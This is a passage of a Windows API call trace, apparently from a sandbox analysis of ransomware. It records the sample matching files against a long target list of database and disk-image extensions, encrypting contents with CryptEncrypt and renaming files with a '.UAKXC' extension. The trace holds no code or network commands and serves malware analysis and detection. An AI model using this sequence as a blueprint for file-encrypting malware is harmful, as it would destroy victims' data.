Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.407] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.408] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.409] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.410] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.411] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.411] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.411] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.413] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.413] SetEndOfFile (hFile=0x6c8) returned 1 [0141.413] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.413] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x16a, lpOverlapped=0x0) returned 1 [0141.413] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.413] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x16a, lpOverlapped=0x0) returned 1 [0141.413] CloseHandle (hObject=0x6c8) returned 1 [0141.416] GetProcessHeap () returned 0xea0000 [0141.416] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.416] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" [0141.416] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.UAKXC" [0141.416] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.uakxc")) returned 1 [0141.417] GetProcessHeap () returned 0xea0000 [0141.417] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.417] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0141.417] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2790 | out: hHeap=0xea0000) returned 1 [0141.417] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0141.417] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0141.418] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0141.418] GetFileAttributesW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi")) returned 0x2006 [0141.420] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.421] GetLastError () returned 0x0 [0141.421] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=3170304) returned 1 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".4dd") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".4dl") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accdb") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accdc") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accde") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accdr") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accdt") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".accft") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".adb") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ade") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".adf") returned 0x0 [0141.421] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".adp") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".arc") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ora") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".alf") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ask") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".btr") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".bdf") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".cat") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".cdb") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ckp") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".cma") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".cpd") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dacpac") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dad") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dadiagrams") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".daschema") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".db") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".db-shm") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".db-wal") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".db3") returned 0x0 [0141.422] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbc") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbf") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbs") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbt") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbv") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dbx") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dcb") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dct") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dcx") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ddl") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dlis") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dp1") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dqy") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dsk") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dsn") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dtsx") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".dxl") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".eco") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".ecx") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".edb") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".epim") returned 0x0 [0141.423] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpSrch=".exb") returned 0x0 [0141.424] StrStrIW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", 